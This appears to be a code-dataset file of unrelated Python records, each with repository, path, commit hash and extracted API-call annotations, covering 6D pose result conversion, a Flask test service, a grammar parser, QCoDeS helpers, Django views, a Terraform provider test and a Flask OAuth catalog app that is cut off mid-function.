[((158, 179), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (173, 179), False, 'import sys\n'), ((596, 608), 'chap2.mav_viewer.mav_viewer', 'mav_viewer', ([], {}), '()\n', (606, 608), False, 'from chap2.mav_viewer import mav_viewer\n'), ((650, 663), 'chap3.data_viewer.data_viewer', 'data_viewer', ([], {}), '()\n', (661, 663), False, 'from chap3.data_viewer import data_viewer\n'), ((929, 963), 'chap4.wind_simulation.wind_simulation', 'wind_simulation', (['SIM.ts_simulation'], {}), '(SIM.ts_simulation)\n', (944, 963), False, 'from chap4.wind_simulation import wind_simulation\n'), ((970, 1001), 'chap4.mav_dynamics.mav_dynamics', 'mav_dynamics', (['SIM.ts_simulation'], {}), '(SIM.ts_simulation)\n', (982, 1001), False, 'from chap4.mav_dynamics import mav_dynamics\n'), ((1359, 1407), 'numpy.array', 'np.array', (['[[delta_e, delta_t, delta_a, delta_r]]'], {}), '([[delta_e, delta_t, delta_a, delta_r]])\n', (1367, 1407), True, 'import numpy as np\n'), ((1584, 1632), 'numpy.array', 'np.array', (['[[delta_e, delta_t, delta_a, delta_r]]'], {}), '([[delta_e, delta_t, delta_a, delta_r]])\n', (1592, 1632), True, 'import numpy as np\n')]
THU-DA-6D-Pose-Group/self6dpp
core/self6dpp/tools/ycbv/ycbv_pbr_so_mlBCE_Double_3_merge_train_real_uw_init_results_with_refined_poses_to_json.py
c267cfa55e440e212136a5e9940598720fa21d16
import os.path as osp import sys import numpy as np import mmcv from tqdm import tqdm from functools import cmp_to_key cur_dir = osp.dirname(osp.abspath(__file__)) PROJ_ROOT = osp.normpath(osp.join(cur_dir, "../../../../")) sys.path.insert(0, PROJ_ROOT) from lib.pysixd import inout, misc from lib.utils.bbox_utils import xyxy_to_xywh from lib.utils.utils import iprint, wprint id2obj = { 1: "002_master_chef_can", # [1.3360, -0.5000, 3.5105] 2: "003_cracker_box", # [0.5575, 1.7005, 4.8050] 3: "004_sugar_box", # [-0.9520, 1.4670, 4.3645] 4: "005_tomato_soup_can", # [-0.0240, -1.5270, 8.4035] 5: "006_mustard_bottle", # [1.2995, 2.4870, -11.8290] 6: "007_tuna_fish_can", # [-0.1565, 0.1150, 4.2625] 7: "008_pudding_box", # [1.1645, -4.2015, 3.1190] 8: "009_gelatin_box", # [1.4460, -0.5915, 3.6085] 9: "010_potted_meat_can", # [2.4195, 0.3075, 8.0715] 10: "011_banana", # [-18.6730, 12.1915, -1.4635] 11: "019_pitcher_base", # [5.3370, 5.8855, 25.6115] 12: "021_bleach_cleanser", # [4.9290, -2.4800, -13.2920] 13: "024_bowl", # [-0.2270, 0.7950, -2.9675] 14: "025_mug", # [-8.4675, -0.6995, -1.6145] 15: "035_power_drill", # [9.0710, 20.9360, -2.1190] 16: "036_wood_block", # [1.4265, -2.5305, 17.1890] 17: "037_scissors", # [7.0535, -28.1320, 0.0420] 18: "040_large_marker", # [0.0460, -2.1040, 0.3500] 19: "051_large_clamp", # [10.5180, -1.9640, -0.4745] 20: "052_extra_large_clamp", # [-0.3950, -10.4130, 0.1620] 21: "061_foam_brick", # [-0.0805, 0.0805, -8.2435] } obj_num = len(id2obj) obj2id = {_name: _id for _id, _name in id2obj.items()} if __name__ == "__main__": new_res_path = osp.join( PROJ_ROOT, "datasets/BOP_DATASETS/ycbv/test/init_poses/", "resnest50d_online_AugCosyAAEGray_mlBCE_DoubleMask_ycbv_pbr_100e_so_GdrnPbrPose_withYolov4PbrBbox_wDeepimPbrPose_ycbv_train_real_uw.json", ) if osp.exists(new_res_path): wprint("{} already exists! overriding!".format(new_res_path)) res_root = "output/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/" iter_num_test = 4 pkl_paths = [ "01_02MasterChefCan/inference_model_final_wo_optim-2de2b4e3/ycbv_002_master_chef_can_train_real_uw/results.pkl", "02_03CrackerBox/inference_model_final_wo_optim-41082f8a/ycbv_003_cracker_box_train_real_uw/results.pkl", "03_04SugarBox/inference_model_final_wo_optim-e09dec3e/ycbv_004_sugar_box_train_real_uw/results.pkl", "04_05TomatoSoupCan/inference_model_final_wo_optim-5641f5d3/ycbv_005_tomato_soup_can_train_real_uw/results.pkl", "05_06MustardBottle/inference_model_final_wo_optim-6ce23e94/ycbv_006_mustard_bottle_train_real_uw/results.pkl", "06_07TunaFishCan/inference_model_final_wo_optim-0a768962/ycbv_007_tuna_fish_can_train_real_uw/results.pkl", "07_08PuddingBox/inference_model_final_wo_optim-f2f2cf73/ycbv_008_pudding_box_train_real_uw/results.pkl", "08_09GelatinBox/inference_model_final_wo_optim-a303aa1e/ycbv_009_gelatin_box_train_real_uw/results.pkl", "09_10PottedMeatCan/inference_model_final_wo_optim-84a56ffd/ycbv_010_potted_meat_can_train_real_uw/results.pkl", "10_11Banana/inference_model_final_wo_optim-83947126/ycbv_011_banana_train_real_uw/results.pkl", "11_19PitcherBase/inference_model_final_wo_optim-af1c7e62/ycbv_019_pitcher_base_train_real_uw/results.pkl", "12_21BleachCleanser/inference_model_final_wo_optim-5d740a46/ycbv_021_bleach_cleanser_train_real_uw/results.pkl", "13_24Bowl/inference_model_final_wo_optim-f11815d3/ycbv_024_bowl_train_real_uw/results.pkl", "14_25Mug/inference_model_final_wo_optim-e4824065/ycbv_025_mug_train_real_uw/results.pkl", "15_35PowerDrill/inference_model_final_wo_optim-30d7d1da/ycbv_035_power_drill_train_real_uw/results.pkl", "16_36WoodBlock/inference_model_final_wo_optim-fbb38751/ycbv_036_wood_block_train_real_uw/results.pkl", "17_37Scissors/inference_model_final_wo_optim-5068c6bb/ycbv_037_scissors_train_real_uw/results.pkl", "18_40LargeMarker/inference_model_final_wo_optim-e8d5867c/ycbv_040_large_marker_train_real_uw/results.pkl", "19_51LargeClamp/inference_model_final_wo_optim-1ea79b34/ycbv_051_large_clamp_train_real_uw/results.pkl", "20_52ExtraLargeClamp/inference_model_final_wo_optim-cb595297/ycbv_052_extra_large_clamp_train_real_uw/results.pkl", "21_61FoamBrick/inference_model_final_wo_optim-d3757ca1/ycbv_061_foam_brick_train_real_uw/results.pkl", ] obj_names = [obj for obj in obj2id] new_res_dict = {} for obj_name, pred_name in zip(obj_names, pkl_paths): assert obj_name in pred_name, "{} not in {}".format(obj_name, pred_name) pred_path = osp.join(res_root, pred_name) assert osp.exists(pred_path), pred_path iprint(obj_name, pred_path) # pkl scene_im_id key, list of preds preds = mmcv.load(pred_path) for scene_im_id, pred_list in preds.items(): for pred in pred_list: obj_id = pred["obj_id"] score = pred["score"] bbox_est = pred["bbox_det_xyxy"] # xyxy bbox_est_xywh = xyxy_to_xywh(bbox_est) refined_pose = pred["pose_{}".format(iter_num_test)] pose_est = pred["pose_0"] cur_new_res = { "obj_id": obj_id, "score": float(score), "bbox_est": bbox_est_xywh.tolist(), "pose_est": pose_est.tolist(), "pose_refine": refined_pose.tolist(), } if scene_im_id not in new_res_dict: new_res_dict[scene_im_id] = [] new_res_dict[scene_im_id].append(cur_new_res) inout.save_json(new_res_path, new_res_dict) iprint() iprint("new result path: {}".format(new_res_path))
[((225, 254), 'sys.path.insert', 'sys.path.insert', (['(0)', 'PROJ_ROOT'], {}), '(0, PROJ_ROOT)\n', (240, 254), False, 'import sys\n'), ((142, 163), 'os.path.abspath', 'osp.abspath', (['__file__'], {}), '(__file__)\n', (153, 163), True, 'import os.path as osp\n'), ((190, 223), 'os.path.join', 'osp.join', (['cur_dir', '"""../../../../"""'], {}), "(cur_dir, '../../../../')\n", (198, 223), True, 'import os.path as osp\n'), ((1704, 1918), 'os.path.join', 'osp.join', (['PROJ_ROOT', '"""datasets/BOP_DATASETS/ycbv/test/init_poses/"""', '"""resnest50d_online_AugCosyAAEGray_mlBCE_DoubleMask_ycbv_pbr_100e_so_GdrnPbrPose_withYolov4PbrBbox_wDeepimPbrPose_ycbv_train_real_uw.json"""'], {}), "(PROJ_ROOT, 'datasets/BOP_DATASETS/ycbv/test/init_poses/',\n 'resnest50d_online_AugCosyAAEGray_mlBCE_DoubleMask_ycbv_pbr_100e_so_GdrnPbrPose_withYolov4PbrBbox_wDeepimPbrPose_ycbv_train_real_uw.json'\n )\n", (1712, 1918), True, 'import os.path as osp\n'), ((1948, 1972), 'os.path.exists', 'osp.exists', (['new_res_path'], {}), '(new_res_path)\n', (1958, 1972), True, 'import os.path as osp\n'), ((5898, 5941), 'lib.pysixd.inout.save_json', 'inout.save_json', (['new_res_path', 'new_res_dict'], {}), '(new_res_path, new_res_dict)\n', (5913, 5941), False, 'from lib.pysixd import inout, misc\n'), ((5946, 5954), 'lib.utils.utils.iprint', 'iprint', ([], {}), '()\n', (5952, 5954), False, 'from lib.utils.utils import iprint, wprint\n'), ((4843, 4872), 'os.path.join', 'osp.join', (['res_root', 'pred_name'], {}), '(res_root, pred_name)\n', (4851, 4872), True, 'import os.path as osp\n'), ((4888, 4909), 'os.path.exists', 'osp.exists', (['pred_path'], {}), '(pred_path)\n', (4898, 4909), True, 'import os.path as osp\n'), ((4929, 4956), 'lib.utils.utils.iprint', 'iprint', (['obj_name', 'pred_path'], {}), '(obj_name, pred_path)\n', (4935, 4956), False, 'from lib.utils.utils import iprint, wprint\n'), ((5020, 5040), 'mmcv.load', 'mmcv.load', (['pred_path'], {}), '(pred_path)\n', (5029, 5040), False, 'import mmcv\n'), ((5297, 5319), 'lib.utils.bbox_utils.xyxy_to_xywh', 'xyxy_to_xywh', (['bbox_est'], {}), '(bbox_est)\n', (5309, 5319), False, 'from lib.utils.bbox_utils import xyxy_to_xywh\n')]
jadbin/guniflask
tests/test_app/rest_app/rest_app/services/account_service.py
36253a962c056abf34884263c6919b02b921ad9c
from flask import abort from guniflask.context import service from ..config.jwt_config import jwt_manager @service class AccountService: accounts = { 'root': { 'authorities': ['role_admin'], 'password': '123456', } } def login(self, username: str, password: str): if username not in self.accounts or self.accounts[username]['password'] != password: return abort(403) account = self.accounts[username] token = jwt_manager.create_access_token(authorities=account['authorities'], username=username) return { 'username': username, 'access_token': token, } def get(self, username: str): if username not in self.accounts: return abort(404) return { 'username': username, 'authorities': self.accounts[username]['authorities'] }
[((432, 442), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (437, 442), False, 'from flask import abort\n'), ((780, 790), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (785, 790), False, 'from flask import abort\n')]
jhh67/chapel
test/library/draft/DataFrames/psahabu/AddSeries.py
f041470e9b88b5fc4914c75aa5a37efcb46aa08f
import pandas as pd I = ["A", "B", "C", "D", "E"] oneDigit = pd.Series([1, 2, 3, 4, 5], pd.Index(I)) twoDigit = pd.Series([10, 20, 30, 40, 50], pd.Index(I)) print "addends:" print oneDigit print twoDigit print print "sum:" print oneDigit + twoDigit print I2 = ["A", "B", "C"] I3 = ["B", "C", "D", "E"] X = pd.Series([0, 1, 2], pd.Index(I2)) Y = pd.Series([10, 20, 0, 0], pd.Index(I3)) print "addends:" print X print Y print print "sum:" print X + Y print A = pd.Series(["hello ", "my ", "name", "is", "brad"]) B = pd.Series(["world", "real"]) print "addends:" print A print B print print "sum: " print A + B
[]
shawcx/nelly
nelly/parser.py
8075b92e20064a117f9ab5a6d8ad261d21234111
# # (c) 2008-2020 Matthew Shaw # import sys import os import re import logging import nelly from .scanner import Scanner from .program import Program from .types import * class Parser(object): def __init__(self, include_dirs=[]): self.include_dirs = include_dirs + [ os.path.join(nelly.root, 'grammars') ] self.pwd = [] # setup the scanner based on the regular expressions self.scanner = Scanner(os.path.join(nelly.root, 'rules.lex')) # container for the compiled program self.program = Program() self.tokens_stack = [] self.groups_stack = [] self.group_stack = [] self.groups = None self.group = None def Parse(self, grammarFile): grammar = grammarFile.read() self.pwd.append(os.path.dirname(grammarFile.name)) logging.debug('Parsing %s (%d bytes)', grammarFile.name, len(grammar)) self.tokens = self.scanner.Scan(grammar) # keep a reference to the tokens for when included files are parsed self.tokens_stack.append(self.tokens) # iterate over all the tokens while self.tokens: (token,value,line,col) = self.tokens.Next() # handle all the top-level tokens if 'nonterminal' == token: if value.startswith('::'): value = value[2:] self._nonterminal(Types.NONTERMINAL, value) elif 'varterminal' == token: if value.startswith('::'): value = value[2:] self._nonterminal(Types.VARTERMINAL, value) elif 'include' == token: self._include() elif 'start_python_code' == token: if r'<%pre' == value: self.program.preamble.append(self._python_code('pre')) elif r'<%post' == value: self.program.postscript.append(self._python_code('post')) else: raise nelly.error('Please specify pre or post in code section') elif 'start_comment' == token: self._comment() else: raise nelly.error('Unhandled %s %s at %d:%d', token, repr(value), line, col) self.tokens_stack.pop() return self.program def _nonterminal(self, _type, name): # create a new container and add it to the program nonterminal = Nonterminal(_type, name) self.program.nonterminals[name] = nonterminal (token,value,line,col) = self.tokens.Next() # parse any optional arguments for the non-terminal if 'lparen' == token: while True: (token,value,line,col) = self.tokens.Next() if 'rparen' == token: break elif 'comma' == token: continue elif 'option' == token: nonterminal.options.append(value) if value == 'start': self.program.start.append(name) elif 'decorator' == token: nonterminal.decorators.append(value[1:]) else: raise nelly.error('Unknown option: %s %s', token, value) (token,value,line,col) = self.tokens.Next() if 'colon' != token: raise nelly.error('Parse error, missing colon at line %d, column %d', line, col) # parse zero or more expressions until a semicolon is found self._expressions('pipe', 'semicolon', nonterminal) def _expressions(self, delimiter, sentinel, nonterminal): (token,value,line,col) = self.tokens.Peek() expression = Expression((line,col)) while self.tokens: (token,value,line,col) = self.tokens.Next() if sentinel == token: nonterminal.expressions.append(expression) break elif delimiter == token: nonterminal.expressions.append(expression) expression = Expression((line,col)) elif 'lparen' == token: anonterminal = Nonterminal(Types.ANONYMOUS) expression.Statement(Types.ANONYMOUS, anonterminal) self._expressions('pipe', 'rparen', anonterminal) elif token in ['start_single_quote', 'start_double_quote', 'start_triple_quote']: quote = self._quote() expression.Statement(Types.TERMINAL, quote) elif token in ['start_single_bytes', 'start_double_bytes', 'start_triple_bytes']: byte_quote = self._quote() expression.Statement(Types.TERMINAL, byte_quote) elif 'nonterminal' == token: expression.Statement(Types.NONTERMINAL, value) elif 'varterminal' == token: expression.Statement(Types.VARTERMINAL, value) elif 'backref' == token: expression.Statement(Types.BACKREFERENCE, value) elif 'function' == token: functerminal = Nonterminal(Types.ANONYMOUS) self._expressions('comma', 'rparen', functerminal) expression.Statement(Types.FUNCTION, value[1:], functerminal) elif 'reference' == token: expression.Statement(Types.REFERENCE, value[1:]) elif 'constant' == token: expression.Statement(Types.TERMINAL, value) elif 'start_python_code' == token: expression.code = self._python_code(nonterminal.name) elif 'lbracket' == token: try: expression.Operation(Types.SLICE, self._slice()) except IndexError: raise nelly.error('Applying slice to nothing at line %d, column %d', line, col) elif 'lcurley' == token: try: expression.Operation(Types.RANGE, self._range()) except IndexError: raise nelly.error('Applying range to nothing at line %d, column %d', line, col) elif 'langle' == token: expression.Weight(self._weight()) elif 'empty' == token: pass else: raise nelly.error('Unhandled token "%s" at line %d, column %d', token, line, col) def _quote(self): # this will always be the quoted value (token,value,line,col) = self.tokens.Next() # this will always be the terminal quote self.tokens.Next() return value # # Slice a string # def _slice(self): front = None back = None start = False (token,value,line,col) = self.tokens.Next() if 'constant' == token: front = value start = True (token,value,line,col) = self.tokens.Next() if 'rbracket' == token: if False == start: raise nelly.error('Empty slice at line %d, column %d', line, col) return (front,front+1) elif 'colon' != token: raise nelly.error('Missing colon at line %d, column %d', line, col) (token,value,line,col) = self.tokens.Next() if 'constant' == token: back = value (token,value,line,col) = self.tokens.Next() elif 'rbracket' != token: raise nelly.error('Missing ] at line %d, column %d', line, col) return (front,back) # # Repeat a range # def _range(self): lower = 0 upper = 0 (token,value,line,col) = self.tokens.Next() if 'constant' != token: raise nelly.error('Missing range at line %d, column %d', line, col) lower = value upper = value (token,value,line,col) = self.tokens.Next() if 'rcurley' == token: return (lower,upper) elif 'comma' != token: raise nelly.error('Missing comma at line %d, column %d', line, col) (token,value,line,col) = self.tokens.Next() if 'constant' == token: upper = value else: raise nelly.error('Missing range at line %d, column %d', line, col) (token,value,line,col) = self.tokens.Next() if 'rcurley' != token: raise nelly.error('Missing } at line %d, column %d', line, col) if lower > upper: lower,upper = upper,lower return (lower,upper) def _weight(self): (token,value,line,col) = self.tokens.Next() if 'constant' != token: raise nelly.error('Missing weight at line %d, column %d', line, col) (token,ignore,line,col) = self.tokens.Next() if 'rangle' != token: raise nelly.error('Missing > at %d, column %d', line, col) return value # # Compile the Python into a code object # def _python_code(self, name): (token,value,line,col) = self.tokens.Next() values = [s for s in value.split('\n') if s.strip()] or [''] # save the whitepsace of the first line ws = re.compile(r'\s*').match(values[0]).group() # check indentation if [s for s in values if not s.startswith(ws)]: raise nelly.error('Bad indentation in code block at line %d, column %d', line, col) # strip and rejoin the code codeblock = '\n'.join(s[len(ws):] for s in values) # eat the end_python_code token self.tokens.Next() try: return compile(codeblock, '<'+name+'>', 'exec') except SyntaxError as e: raise nelly.error('%d: %s: %s', e.lineno, e.msg, repr(e.text)) # # Include other BNF files # def _include(self): (token,value,line,col) = self.tokens.Next() # file names are quoted if token not in ['start_single_quote', 'start_double_quote', 'start_triple_quote']: raise nelly.error('quoted file path expected') # get the quoted value path = self._quote() # try opening the file in each include directory, ignore errors content = None for include_dir in self.pwd[-1:] + self.include_dirs: try: fullpath = os.path.join(include_dir, path) content = open(fullpath, 'r') logging.debug('Including file %s', repr(fullpath)) break except: continue # if no file was found, throw an error if None == content: raise nelly.error('Could not load file %s', repr(path)) # ignore empty file if not content: return # compile it inline self.Parse(content) self.pwd.pop() # restore the current tokens self.tokens = self.tokens_stack[-1] # # Multi-line comments # def _comment(self): # consume and disregard the tokens while True: (token,value,line,col) = self.tokens.Next() if 'start_comment' == token: self._comment() if 'end_comment' == token: return
[((440, 477), 'os.path.join', 'os.path.join', (['nelly.root', '"""rules.lex"""'], {}), "(nelly.root, 'rules.lex')\n", (452, 477), False, 'import os\n'), ((804, 837), 'os.path.dirname', 'os.path.dirname', (['grammarFile.name'], {}), '(grammarFile.name)\n', (819, 837), False, 'import os\n'), ((3384, 3458), 'nelly.error', 'nelly.error', (['"""Parse error, missing colon at line %d, column %d"""', 'line', 'col'], {}), "('Parse error, missing colon at line %d, column %d', line, col)\n", (3395, 3458), False, 'import nelly\n'), ((7698, 7759), 'nelly.error', 'nelly.error', (['"""Missing range at line %d, column %d"""', 'line', 'col'], {}), "('Missing range at line %d, column %d', line, col)\n", (7709, 7759), False, 'import nelly\n'), ((8176, 8237), 'nelly.error', 'nelly.error', (['"""Missing range at line %d, column %d"""', 'line', 'col'], {}), "('Missing range at line %d, column %d', line, col)\n", (8187, 8237), False, 'import nelly\n'), ((8340, 8397), 'nelly.error', 'nelly.error', (['"""Missing } at line %d, column %d"""', 'line', 'col'], {}), "('Missing } at line %d, column %d', line, col)\n", (8351, 8397), False, 'import nelly\n'), ((8619, 8681), 'nelly.error', 'nelly.error', (['"""Missing weight at line %d, column %d"""', 'line', 'col'], {}), "('Missing weight at line %d, column %d', line, col)\n", (8630, 8681), False, 'import nelly\n'), ((8783, 8835), 'nelly.error', 'nelly.error', (['"""Missing > at %d, column %d"""', 'line', 'col'], {}), "('Missing > at %d, column %d', line, col)\n", (8794, 8835), False, 'import nelly\n'), ((9279, 9356), 'nelly.error', 'nelly.error', (['"""Bad indentation in code block at line %d, column %d"""', 'line', 'col'], {}), "('Bad indentation in code block at line %d, column %d', line, col)\n", (9290, 9356), False, 'import nelly\n'), ((9965, 10005), 'nelly.error', 'nelly.error', (['"""quoted file path expected"""'], {}), "('quoted file path expected')\n", (9976, 10005), False, 'import nelly\n'), ((286, 322), 'os.path.join', 'os.path.join', (['nelly.root', '"""grammars"""'], {}), "(nelly.root, 'grammars')\n", (298, 322), False, 'import os\n'), ((6991, 7050), 'nelly.error', 'nelly.error', (['"""Empty slice at line %d, column %d"""', 'line', 'col'], {}), "('Empty slice at line %d, column %d', line, col)\n", (7002, 7050), False, 'import nelly\n'), ((7136, 7197), 'nelly.error', 'nelly.error', (['"""Missing colon at line %d, column %d"""', 'line', 'col'], {}), "('Missing colon at line %d, column %d', line, col)\n", (7147, 7197), False, 'import nelly\n'), ((7416, 7473), 'nelly.error', 'nelly.error', (['"""Missing ] at line %d, column %d"""', 'line', 'col'], {}), "('Missing ] at line %d, column %d', line, col)\n", (7427, 7473), False, 'import nelly\n'), ((7971, 8032), 'nelly.error', 'nelly.error', (['"""Missing comma at line %d, column %d"""', 'line', 'col'], {}), "('Missing comma at line %d, column %d', line, col)\n", (7982, 8032), False, 'import nelly\n'), ((10269, 10300), 'os.path.join', 'os.path.join', (['include_dir', 'path'], {}), '(include_dir, path)\n', (10281, 10300), False, 'import os\n'), ((9132, 9150), 're.compile', 're.compile', (['"""\\\\s*"""'], {}), "('\\\\s*')\n", (9142, 9150), False, 'import re\n'), ((3229, 3279), 'nelly.error', 'nelly.error', (['"""Unknown option: %s %s"""', 'token', 'value'], {}), "('Unknown option: %s %s', token, value)\n", (3240, 3279), False, 'import nelly\n'), ((2019, 2076), 'nelly.error', 'nelly.error', (['"""Please specify pre or post in code section"""'], {}), "('Please specify pre or post in code section')\n", (2030, 2076), False, 'import nelly\n'), ((5780, 5853), 'nelly.error', 'nelly.error', (['"""Applying slice to nothing at line %d, column %d"""', 'line', 'col'], {}), "('Applying slice to nothing at line %d, column %d', line, col)\n", (5791, 5853), False, 'import nelly\n'), ((6042, 6115), 'nelly.error', 'nelly.error', (['"""Applying range to nothing at line %d, column %d"""', 'line', 'col'], {}), "('Applying range to nothing at line %d, column %d', line, col)\n", (6053, 6115), False, 'import nelly\n'), ((6298, 6373), 'nelly.error', 'nelly.error', (['"""Unhandled token "%s" at line %d, column %d"""', 'token', 'line', 'col'], {}), '(\'Unhandled token "%s" at line %d, column %d\', token, line, col)\n', (6309, 6373), False, 'import nelly\n')]
zhinst/Qcodes
qcodes/utils/installation_info.py
d95798bd08d57bb8cddd460fdb4a5ff25f19215c
""" This module contains helper functions that provide information about how QCoDeS is installed and about what other packages are installed along with QCoDeS """ import sys from typing import Dict, List, Optional import subprocess import json import logging import requirements if sys.version_info >= (3, 8): from importlib.metadata import distribution, version, PackageNotFoundError else: # 3.7 and earlier from importlib_metadata import distribution, version, PackageNotFoundError import qcodes log = logging.getLogger(__name__) def is_qcodes_installed_editably() -> Optional[bool]: """ Try to ask pip whether QCoDeS is installed in editable mode and return the answer a boolean. Returns None if pip somehow did not respond as expected. """ answer: Optional[bool] try: pipproc = subprocess.run(['python', '-m', 'pip', 'list', '-e', '--no-index', '--format=json'], check=True, stdout=subprocess.PIPE) e_pkgs = json.loads(pipproc.stdout.decode('utf-8')) answer = any([d["name"] == 'qcodes' for d in e_pkgs]) except Exception as e: # we actually do want a catch-all here log.warning(f'{type(e)}: {str(e)}') answer = None return answer def get_qcodes_version() -> str: """ Get the version of the currently installed QCoDeS """ return qcodes.version.__version__ def get_qcodes_requirements() -> List[str]: """ Return a list of the names of the packages that QCoDeS requires """ qc_pkg = distribution('qcodes').requires if qc_pkg is None: return [] package_names = [list(requirements.parse(req))[0].name for req in qc_pkg] return package_names def get_qcodes_requirements_versions() -> Dict[str, str]: """ Return a dictionary of the currently installed versions of the packages that QCoDeS requires. The dict maps package name to version string. If an (optional) dependency is not installed the name maps to "Not installed". """ req_names = get_qcodes_requirements() req_versions = {} for req in req_names: try: req_versions[req] = version(req) except PackageNotFoundError: req_versions[req] = "Not installed" return req_versions
[((519, 546), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (536, 546), False, 'import logging\n'), ((837, 961), 'subprocess.run', 'subprocess.run', (["['python', '-m', 'pip', 'list', '-e', '--no-index', '--format=json']"], {'check': '(True)', 'stdout': 'subprocess.PIPE'}), "(['python', '-m', 'pip', 'list', '-e', '--no-index',\n '--format=json'], check=True, stdout=subprocess.PIPE)\n", (851, 961), False, 'import subprocess\n'), ((1618, 1640), 'importlib_metadata.distribution', 'distribution', (['"""qcodes"""'], {}), "('qcodes')\n", (1630, 1640), False, 'from importlib_metadata import distribution, version, PackageNotFoundError\n'), ((2240, 2252), 'importlib_metadata.version', 'version', (['req'], {}), '(req)\n', (2247, 2252), False, 'from importlib_metadata import distribution, version, PackageNotFoundError\n'), ((1717, 1740), 'requirements.parse', 'requirements.parse', (['req'], {}), '(req)\n', (1735, 1740), False, 'import requirements\n')]
brandonrobertz/foia-pdf-processing-system
documents/views.py
025516b5e2234df16741237c4208cd484f577370
from django.shortcuts import render from django.http import JsonResponse from .models import FieldCategory def fieldname_values(request): if request.method == "GET": fieldname = request.GET['fieldname'] query = request.GET.get('q') q_kwargs= dict( fieldname=fieldname, ) if query: q_kwargs['value__icontains'] = query fc = FieldCategory.objects.filter( **q_kwargs ).order_by("-count").values('value') return JsonResponse(list(fc), safe=False) elif request.method == "POST": fieldname = request.POST['fieldname'] value = request.POST['value'] fc, created = FieldCategory.objects.get_or_create( fieldname=fieldname, value=value ) return JsonResponse({'status': 'ok'}) def fieldname_value_count(request): # just let it explode if people don't POST properly fieldname = request.POST['fieldname'] value = request.POST['value'] fc = FieldCategory.objects.get( fieldname=fieldname, value=value ) fc.count += 1 fc.save() return JsonResponse({'status': 'ok'})
[((1146, 1176), 'django.http.JsonResponse', 'JsonResponse', (["{'status': 'ok'}"], {}), "({'status': 'ok'})\n", (1158, 1176), False, 'from django.http import JsonResponse\n'), ((811, 841), 'django.http.JsonResponse', 'JsonResponse', (["{'status': 'ok'}"], {}), "({'status': 'ok'})\n", (823, 841), False, 'from django.http import JsonResponse\n')]
mjuenema/python-terrascript
tests/test_provider_Mongey_kafka_connect.py
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
# tests/test_provider_Mongey_kafka-connect.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:20:11 UTC) def test_provider_import(): import terrascript.provider.Mongey.kafka_connect def test_resource_import(): from terrascript.resource.Mongey.kafka_connect import kafka_connect_connector # TODO: Shortcut imports without namespace for official and supported providers. # TODO: This has to be moved into a required_providers block. # def test_version_source(): # # import terrascript.provider.Mongey.kafka_connect # # t = terrascript.provider.Mongey.kafka_connect.kafka_connect() # s = str(t) # # assert 'https://github.com/Mongey/terraform-provider-kafka-connect' in s # assert '0.2.3' in s
[]
nicholsont/catalog_app
application.py
011e4c35401aa1128a4cf1ca99dd808da7a759e6
from flask import Flask, render_template, request, redirect, jsonify, g from flask import url_for, flash, make_response from flask import session as login_session from sqlalchemy import create_engine, asc from sqlalchemy.orm import sessionmaker from models import Base, Category, Item, User from oauth2client.client import flow_from_clientsecrets from oauth2client.client import FlowExchangeError import httplib2 import json import requests app = Flask(__name__) # Retrieves client ID's and secrets from the json files CLIENT_ID = json.loads(open('client_secrets.json', 'r') .read())['web']['client_id'] APP_ID = json.loads(open('fb_client_secrets.json', 'r') .read())['web']['app_id'] APP_SECRET = json.loads(open('fb_client_secrets.json', 'r') .read())['web']['app_secret'] # Connect to Database and create database session engine = create_engine('sqlite:///catalog.db') Base.metadata.bind = engine DBSession = sessionmaker(bind=engine) session = DBSession() # Login handler @app.route('/login') def showLogin(): """JSON API to view entire catalog Information.""" return render_template('login.html') # Third Party Oauth callback @app.route('/oauth/<provider>', methods=['POST']) def oauthLogin(provider): """ Retrieves provider to process oauth login. params:(string) oauth provider """ if provider == 'google': code = request.data try: # Upgrade auth code into credentials object oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='') oauth_flow.redirect_uri = 'postmessage' credentials = oauth_flow.step2_exchange(code) except FlowExchangeError: response = make_response( json.dumps('Failed to upgrade the authorization code.'), 401) response.headers['Content-Type'] = 'application/json' return response # Check for valid access token access_token = credentials.access_token url = 'https://www.googleapis.com/oauth2/v1/tokeninfo?' \ 'access_token={}'.format(access_token) h = httplib2.Http() result = json.loads(h.request(url, 'GET')[1]) # Access token error handling if result.get('error') is not None: response = make_response(json.dumps(result.get('error')), 500) response.headers['Content-Type'] = ' application/json' return response # Store access token in session login_session['provider'] = 'google' login_session['access_token'] = access_token login_session['gplus_id'] = credentials.id_token['sub'] # Get user info userinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo' params = {'access_token': login_session['access_token'], 'alt': 'json'} answer = requests.get(userinfo_url, params=params) data = json.loads(answer.text) login_session['username'] = data['name'] login_session['picture'] = data['picture'] login_session['email'] = data['email'] elif provider == 'facebook': access_token = request.data url = 'https://graph.facebook.com/oauth/access_token?grant_type=' \ 'fb_exchange_token&client_id={}&client_secret={}&' \ 'fb_exchange_token={}'.format(APP_ID, APP_SECRET, access_token) # noqa h = httplib2.Http() result = json.loads(h.request(url, 'GET')[1]) # Strip expire tag from access token access_token = result['access_token'] url = 'https://graph.facebook.com/v2.11/me?access_token={}&fields=' \ 'name,id,email,picture'.format(access_token) # noqa h = httplib2.Http() result = json.loads(h.request(url, 'GET')[1]) # Get user info data = result login_session['access_token'] = access_token login_session['provider'] = 'facebook' login_session['username'] = data['name'] login_session['email'] = data['email'] login_session['picture'] = data['picture']['data']['url'] login_session['facebook_id'] = data['id'] # Checks if user exists in DB if getUserID(login_session['email']) is not None: login_session['user_id'] = getUserID(login_session['email']) else: createUser(login_session) login_session['user_id'] = getUserID(login_session['email']) # Stores token in session user = session.query(User).filter_by(email=login_session['email']).first() token = user.generate_auth_token(600) login_session['token'] = token output = '' output += '<h1>Welcome, {}!</h1>'.format(login_session['username']) output += '<img src="{}" '.format(login_session['picture']) output += 'style = "width: 300px; height: 300px; border-radius: 150px;' \ '-webkit-border-radius: 150px;-moz-border-radius: 150px;">' flash('Now logged in as {}'.format(login_session['username'])) return output def createUser(login_session): newUser = User(username=login_session['username'], email=login_session['email'], picture=login_session['picture']) session.add(newUser) session.commit() def getUserID(email): try: user = 